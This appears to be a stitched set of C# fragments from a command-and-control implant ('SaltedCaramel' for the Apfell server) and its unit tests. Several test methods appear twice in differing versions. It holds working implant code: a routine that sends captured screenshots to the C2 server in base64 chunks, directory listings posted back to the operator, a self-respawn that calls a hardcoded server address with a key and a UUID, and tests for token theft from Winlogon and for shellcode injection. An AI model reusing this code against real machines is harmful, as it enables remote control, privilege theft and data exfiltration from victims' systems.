public void TokenWinlogon() { SCTask task = new SCTask("steal_token", "", "1"); task.DispatchTask(implant); Assert.AreEqual(task.status, "complete"); }
public void TaskChangeDirValid() { SCTask task = new SCTask("cd", "C:\\Temp", "1"); Tasks.ChangeDir.Execute(task); Assert.AreEqual("complete", task.status); }
public void TaskChangeDirInvalid() { SCTask task = new SCTask("cd", "C:\\asdf", "1"); Tasks.ChangeDir.Execute(task); Assert.AreEqual("error", task.status); }
public void TaskChangeDirValid() { SCTask task = new SCTask("cd", "C:\\Temp", "1"); task.DispatchTask(implant); Assert.AreEqual(task.status, "complete"); }
public void Shellcode() { SCTask task = new SCTask("shinject", "", "1"); task.DispatchTask(implant); Assert.AreEqual(task.status, "complete"); }
public void TaskChangeDirInvalid() { SCTask task = new SCTask("cd", "C:\\asdf", "1"); task.DispatchTask(implant); Assert.AreEqual(task.status, "error"); }
// Same workflow as sending a file to Apfell server, but we only use one chunk private static void SendCapture(SCImplant implant, SCTask task, byte[] screenshot) { try // Try block for HTTP request { // Send total number of chunks to Apfell server // Number of chunks will always be one for screen capture task // Receive file ID in response SCTaskResp initial = new SCTaskResp(task.id, "{\"total_chunks\": " + 1 + ", \"task\":\"" + task.id + "\"}"); DownloadReply reply = JsonConvert.DeserializeObject <DownloadReply>(implant.PostResponse(initial)); Debug.WriteLine($"[-] SendCapture - Received reply, file ID: " + reply.file_id); // Convert chunk to base64 blob and create our FileChunk FileChunk fc = new FileChunk(); fc.chunk_num = 1; fc.file_id = reply.file_id; fc.chunk_data = Convert.ToBase64String(screenshot); // Send our FileChunk to Apfell server // Receive status in response SCTaskResp response = new SCTaskResp(task.id, JsonConvert.SerializeObject(fc)); Debug.WriteLine($"[+] SendCapture - CHUNK SENT: {fc.chunk_num}"); string postReply = implant.PostResponse(response); Debug.WriteLine($"[-] SendCapture - RESPONSE: {implant.PostResponse(response)}"); // Tell the Apfell server file transfer is done implant.SendComplete(task.id); } catch (Exception e) // Catch exceptions from HTTP requests { // Something failed, so we need to tell the server about it task.status = "error"; task.message = e.Message; } }
public static void Execute(SCTask task, SCImplant implant) { if (task.command == "jobs") { task.status = "complete"; task.message = JsonConvert.SerializeObject(implant.jobs); } else if (task.command == "jobkill") { Thread t; foreach (Job j in implant.jobs) { if (j.shortId == Convert.ToInt32(task.@params)) { t = j.thread; try { t.Abort(); task.status = "complete"; task.message = $"Killed job {j.shortId}"; } catch (Exception e) { task.status = "error"; task.message = $"Error stopping job {j.shortId}: {e.Message}"; } } } } }
public void TokenInvalid() { SCTask task = new SCTask("steal_token", "12351", "1"); task.DispatchTask(implant); Assert.AreEqual(task.status, "error"); }
public static void Execute(SCTask task, SCImplant implant) { string path = task.@params; SharpSploitResultList <Host.FileSystemEntryResult> list; try { if (path != "") { list = Host.GetDirectoryListing(path); } else { list = Host.GetDirectoryListing(); } List <Dictionary <string, string> > fileList = new List <Dictionary <string, string> >(); foreach (Host.FileSystemEntryResult item in list) { FileInfo f = new FileInfo(item.Name); Dictionary <string, string> infoDict = new Dictionary <string, string>(); try { infoDict.Add("size", f.Length.ToString()); infoDict.Add("type", "file"); infoDict.Add("name", f.Name); fileList.Add(infoDict); } catch { infoDict.Add("size", "0"); infoDict.Add("type", "dir"); infoDict.Add("name", item.Name); fileList.Add(infoDict); } } SCTaskResp response = new SCTaskResp(task.id, JsonConvert.SerializeObject(fileList)); implant.PostResponse(response); implant.SendComplete(task.id); task.status = "complete"; task.message = fileList.ToString(); } catch (DirectoryNotFoundException) { Debug.WriteLine($"[!] DirectoryList - ERROR: Directory not found: {path}"); implant.SendError(task.id, "Error: Directory not found."); task.status = "error"; task.message = "Directory not found."; } catch (Exception e) { Debug.WriteLine($"DirectoryList - ERROR: {e.Message}"); implant.SendError(task.id, $"Error: {e.Message}"); task.status = "error"; task.message = e.Message; } }
public void PowerShellValid() { SCTask task = new SCTask("powershell", "Get-Process", "1"); Tasks.Powershell.Execute(task); Assert.AreEqual("complete", task.status); Assert.IsNotNull(task.message); }
public void KillInvalid() { SCTask task = new SCTask("kill", "1234567", "1"); Tasks.Kill.Execute(task); Assert.AreEqual("error", task.status); Assert.IsNotNull(task.message); }
public void DirectoryListInvalid() { SCTask task = new SCTask("ls", "C:\\asdf", "1"); Tasks.DirectoryList.Execute(task, implant); Assert.AreEqual("error", task.status); Assert.IsNotNull(task.message); }
public void DirectoryListValid() { SCTask task = new SCTask("ls", "C:\\Temp", "1"); Tasks.DirectoryList.Execute(task, implant); Assert.AreEqual("complete", task.status); Assert.IsNotNull(task.message); }
public void TokenInvalid() { SCTask task = new SCTask("steal_token", "12351", "1"); Tasks.Token.Execute(task); Assert.AreEqual("error", task.status); Tasks.Token.Revert(); }
public void TokenWinlogon() { SCTask task = new SCTask("steal_token", "", "1"); Tasks.Token.Execute(task); Assert.AreEqual("complete", task.status); Tasks.Token.Revert(); }
public static void Execute(SCTask task) { if (LoadShellcode()) { task.status = "complete"; task.message = "Shellcode loaded."; } }
public void ProcInvalid() { SCTask task = new SCTask("run", "asdf", "1"); task.DispatchTask(implant); Assert.AreEqual(task.status, "error"); Assert.IsNotNull(task.message); }
public void PowerShellValid() { SCTask task = new SCTask("powershell", "Get-Process", "1"); task.DispatchTask(implant); Assert.AreEqual(task.status, "complete"); Assert.IsNotNull(task.message); }
public void ProcValid() { SCTask task = new SCTask("run", "whoami", "1"); task.DispatchTask(implant); Assert.AreEqual(task.status, "complete"); Assert.IsNotNull(task.message); }
public void KillInvalid() { SCTask task = new SCTask("kill", "1234567", "1"); task.DispatchTask(implant); Assert.AreEqual(task.status, "error"); Assert.IsNotNull(task.message); }
public void DirectoryListInvalid() { SCTask task = new SCTask("ls", "C:\\asdf", "1"); task.DispatchTask(implant); Assert.AreEqual(task.status, "error"); Assert.IsNotNull(task.message); }
public void DirectoryListValid() { SCTask task = new SCTask("ls", "C:\\Temp", "1"); task.DispatchTask(implant); Assert.AreEqual(task.status, "complete"); Assert.IsNotNull(task.message); }
public void ProcessList() { SCTask task = new SCTask("ps", "", "1"); Tasks.ProcessList.Execute(task); Assert.AreEqual("complete", task.status); Assert.IsNotNull(task.message); Assert.IsTrue(task.message.Contains("explorer")); }
public void ProcValid() { Tasks.Token.stolenHandle = IntPtr.Zero; SCTask task = new SCTask("run", "whoami /priv", "1"); Tasks.Proc.Execute(task, implant); Assert.AreEqual("complete", task.status); Assert.IsNotNull(task.message); }
public void ProcInvalid() { Tasks.Token.stolenHandle = IntPtr.Zero; SCTask task = new SCTask("run", "asdf", "1"); Tasks.Proc.Execute(task, implant); Assert.AreEqual("error", task.status); Assert.IsNotNull(task.message); }
public void ProcessList() { SCTask task = new SCTask("ps", "", "1"); task.DispatchTask(implant); Assert.AreEqual(task.status, "complete"); Assert.IsNotNull(task.message); Assert.IsTrue(task.message.Contains("explorer")); }
public static void Execute(SCTask task) { //typeof(SaltedCaramel).Assembly.EntryPoint.Invoke(null, // new[] { new string[] { "https://192.168.38.192", "CqxQlHyWOSWJprgBA6aiKPP94lCSn8+Ki+gpMVdLNgQ=", "3915d66f-e9a5-4912-8442-910e0cee74df" } }); AppDomain domain = AppDomain.CreateDomain("asdfasdf"); Assembly target = domain.Load(typeof(SaltedCaramel).Assembly.FullName); string[] args = { "https://192.168.38.192", "CqxQlHyWOSWJprgBA6aiKPP94lCSn8+Ki+gpMVdLNgQ=", "3915d66f-e9a5-4912-8442-910e0cee74df" }; target.EntryPoint.Invoke(null, new[] { args }); }
// (username, (password, netonly)) public static void Execute(SCTask task) { if (task.command == "steal_token") { StealToken(task); } else if (task.command == "make_token") { MakeToken(task); } }
public static void Execute(SCTask task, SCImplant implant) { try { implant.SendComplete(task.id); } catch (Exception e) { implant.SendError(task.id, e.Message); } Environment.Exit(0); }